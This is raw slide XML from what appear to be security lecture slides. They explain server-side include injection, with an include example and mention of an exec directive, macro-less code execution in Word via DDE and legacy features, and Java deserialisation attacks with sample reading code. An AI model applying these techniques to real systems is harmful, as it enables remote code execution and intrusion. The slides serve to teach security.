              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>instructions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> a web server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>written</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>inside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t> HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>. Eg </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB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alt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&lt;!--#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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include file=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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header.html" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" alt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--&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" alt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nl-NL" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If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attacker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can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inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> HTML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into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> a webpage,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then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> he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can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try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to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inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> a SSI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directive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that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will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be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executed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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> server</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" alt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Times New Roman" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" altLang="en-US" dirty="0" smtClean="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49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nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Of course,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there</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> is a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directive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to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> programs &amp; scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL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nl-NL" alt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&lt;!--#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" alt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nl-NL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alt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nl-NL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nl-NL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nl-NL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nl-NL" alt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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" alt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/" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" alt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--&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" alt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NB: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>with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 SSI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>injected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 code is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>executed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nl-NL" altLang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>server-side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,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>with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 XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>injected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 code ( javascript) is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>executed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nl-NL" altLang="en-US" sz="1800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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in browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" alt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alt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3D463E0A-87C3-4E0A-BBD6-4B48CEE51CB4}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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7943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More exotic ways to get execution in Word files  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Without standard VBA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Visual Basic for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Applications)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> macros,            there are still ways to get execution in Office documents…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>sing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DDE (Dynamic Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exchange)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRP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lso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>emails in Outlook Rich Text Format (RTF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>             https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
              <a:t>sensepost.com/blog/2017/macro-less-code-exec-in-msword</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>In 2018 &amp; 2019 Stan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Hegt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> &amp; Pieter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Ceelen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> of Outflank B.V. presented more techniques to get execution using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> archaic legacy features that predate VBA  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>https://outflank.nl/blog/author/stan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>://outflank.nl/blog/author/pieter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRP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2931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DDE warnings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dirty="0" smtClean="0"/>
              <a:t>Microsoft considers DDE a feature, and not a bug, but did file a security advisory data autumn 2017</a:t>
            </a:r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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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50000" r="14563" b="19744"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2699792" y="3284984"/>
            <a:ext cx="4786966" cy="137625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39998" r="4326" b="23327"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115616" y="1319592"/>
            <a:ext cx="5544616" cy="16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Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> attacks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5"/>
            <a:ext cx="7990656" cy="496014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Serialisation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>marshalling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flattening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pickling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The process of turning some data structure into a binary representation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Why?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                To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>transfer it over network                                                              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339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>store it on disk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for persistence)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nverse operation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialisation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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unmarshalling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unpickling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, … used later to reconstruct the object from the raw data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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of malicious input can trigger weird behaviour!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This affects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java, PHP, python, Ruby, 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26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825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Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>[for Java]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4"/>
            <a:ext cx="7761288" cy="512365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 dirty="0" smtClean="0"/>
              <a:t>Sample code to read in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t> objects from a file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GB" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FileInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"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latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fileIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FileInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>students.ser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>");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GB" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ObjectInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"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latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>objectIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ObjectInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fileIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);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GB" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>             s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(Student) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>objectIn.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="180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(); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>deserialise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="180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and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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cast</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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If file contains serialised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Student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> objects, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will execute the deserialization code from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Student.java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If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file </a:t>
            </a:r>
            <a:r>
